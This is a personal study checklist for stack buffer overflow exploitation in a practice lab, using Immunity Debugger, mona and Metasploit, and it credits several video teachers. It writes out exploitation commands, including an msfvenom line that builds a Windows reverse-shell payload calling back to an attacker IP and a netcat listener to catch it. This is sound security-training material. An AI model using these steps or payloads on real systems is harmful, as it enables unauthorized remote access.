Introduction
While learning basic buffer overflows I found it very difficult to grasp, seemed overwhelming. Iterated on the topic for a week or so, finally understood. I followed guidance from @0xTib3rius, @thecybermentor and @LiveOverflow among countless others. All have covered this topic is great detail. This writing is a combination of their teachings and my learning written as a “checklist”. I made this for myself as an aid/study guide. Hope you find it useful!
Adding this to the “Yay.. I finally get it” pile of BOF write ups and walkthroughs.
Resources
Videos I used to learn basic stack BOF
Tib3rius: Stack Based BOF: https://youtu.be/1X2JGF_9JGM
The Cyber Mentor: BOF Made Easy: https://youtu.be/qSnPayW6F7U
The Cyber Mentor: Brainpan THM WT: https://youtu.be/T1-Sds8ZHBU
LiveOverflow: https://www.youtube.com/c/LiveOverflowCTF/videos
Scripts used can be found here:
Tib3rius: buffer-overflows.rst: https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst
Action
This assumes you have found the vulnerable application and know how to connect to it locally and remotely. Also, assumes you have copied the app to your local Immunity machine.
1. Load the app in Immunity debugger
2. Tell Immunity where to store mona’s working data
— !mona config -set workingfolder c:\mona\%p
3. Run the app in Immunity
4. Fuzz the app from attacking machine using fuzz.py
5. Make note of crash point (for cyclic pattern creation)
6. Obtain and Verify EIP control with cyclic pattern
Create cyclic pattern with metasploit framework
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <number of bytes fuzzed>`
— Copy the created cyclic pattern to the payload of exploit.py
Reload and restart the app in Immunity debugger
Run exploit.py
Use mona to find EIP
— !mona findmsp -distance <number of bytes fuzzed>
— Look for and make note of EIP
— Copy offset found with mona to offset string in exploit.py
— Set the payload to “”
— Set the retn to “BBBB”
— Reload app in Immunity
— Send exploit.py
— EIP should be over written with 42424242 (‘hex of BBBB’)
— If EIP is overwritten then continue. If not start over you dont have control of EIP
7. Find bad characters
Generate a byte array using mona
— !mona bytearray -b “\x00”
— — make note of where the bytearray.bin is stored for compairing later
Generate a string of bad characters
— run badchars.py
— copy output to payload of exploit.py
— reload/start app in Immunity
— send exploit.py
— make note of ESP address (right click >copy address)
— use mona to compare badchar payload to mona byte array
— — !mona compare -f C:\mona\oscp\bytearray.bin -a (ESP address)
— Add output (besides x00 since we did already) to NEW mona byte array.. these are badchars
— — For each bad character found with mona compare add bad character to NEW mona byte array, one at a time
— — — !mona bytearray -b “\x00(newbadchar)”`
— — — edit payload of exploit.py to remove found badchars one by one
— — — restart app in Immunity
— — — send exploit.py
— — — compare byte array
— — — — !mona compare -f C:\mona\oscp\bytearray.bin -a (ESP address)`
— — — repeat until all bad chars found.. compare status “Unmodified”
8. Find the jump (JMP ESP) points that dont have bad characters
— !mona jmp -r esp -cpb “\x(BAD CHARS LIST)”
— choose an address
— copy address to exploit.py retn (overwrite BBBB)
— — Make note of system architecture.. if Little Endian (x86) make sure you enter address backwards with /x every two bytes (characters) (625011AF would be \xAF\x11\x50\x62 in Little Endian)
9. Generate payload with msvenom
— msfvenom -p windows/shell_reverse_tcp LHOST=(*YOUR IP*) LPORT=4444 EXITFUNC=thread -b “\x(all bad chars found)” -f c
— Copy resulting c code output to payload of exploit.py (do not include semicolon or anything other than hex)
10. Prepend NOPs to allow for payload run time and memory space to unpack payload
— Edit exploit.py padding like this: padding = “\x90” * 16 (NOTE: Sled can be greater than 16)
11. Exploit
— Start a netcat listener on chosen port in payload
— Restart/reload app on live environment
— Run exploit.py and hope for the best!
